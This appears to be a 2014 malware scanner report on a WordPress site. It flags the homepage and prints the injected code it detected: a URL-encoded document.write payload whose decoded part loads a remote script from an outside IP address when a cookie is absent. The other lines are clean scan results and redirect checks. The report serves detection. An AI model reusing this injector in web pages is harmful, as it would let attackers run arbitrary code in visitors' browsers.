Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theilluminator.biz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://theilluminator.biz/ | 200 OK Content-Length: 22181 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://theilluminator.biz/wp-content/themes/boldy/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://theilluminator.biz/wp-content/themes/boldy/js/jquery.form.js | 200 OK Content-Length: 31710 Content-Type: application/javascript | clean |
http://theilluminator.biz/wp-content/themes/boldy/js/ddsmoothmenu.js | 200 OK Content-Length: 7013 Content-Type: application/javascript | clean |
http://theilluminator.biz/wp-content/themes/boldy/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 7015 Content-Type: application/javascript | clean |
http://theilluminator.biz/wp-content/themes/boldy/js/jquery.prettyPhoto.js | 200 OK Content-Length: 16851 Content-Type: application/javascript | clean |
http://theilluminator.biz/wp-content/themes/boldy/js/custom.js | 200 OK Content-Length: 1811 Content-Type: application/javascript | clean |
http://theilluminator.biz/wp-content/themes/boldy/js/cufon-yui.js | 200 OK Content-Length: 32513 Content-Type: application/javascript | clean |
http://theilluminator.biz/wp-content/themes/boldy/js/Museo_Slab_500_400.font.js | 200 OK Content-Length: 27924 Content-Type: application/javascript | clean |
http://canexback.com/stats.js | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
http://canexback.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 08 Aug 2014 15:47:29 UTC Location: https://twitter.com/javascripts/blogger.js Server: tfe Content-Length: 0 Set-Cookie: guest_id=v1%3A140751284958386612; Domain=.twitter.com; Path=/; Expires=Sun, 07-Aug-2016 15:47:29 UTC | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 54855 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.7243accf0ef590f027ecd4f9adc0dc8be9cf2c7d.js | 200 OK Content-Length: 300344 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theilluminator.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 08 Aug 2014 15:47:22 GMT
Server: nginx/1.6.1
Content-Type: text/html; charset=UTF-8
X-Pingback: http://theilluminator.biz/xmlrpc.php
GET / HTTP/1.1
Host: theilluminator.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 08 Aug 2014 15:47:22 GMT
Server: nginx/1.6.1
Content-Type: text/html; charset=UTF-8
X-Pingback: http://theilluminator.biz/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: theilluminator.biz
Referer: http://www.google.com/search?q=theilluminator.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theilluminator.biz
Referer: http://www.google.com/search?q=theilluminator.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.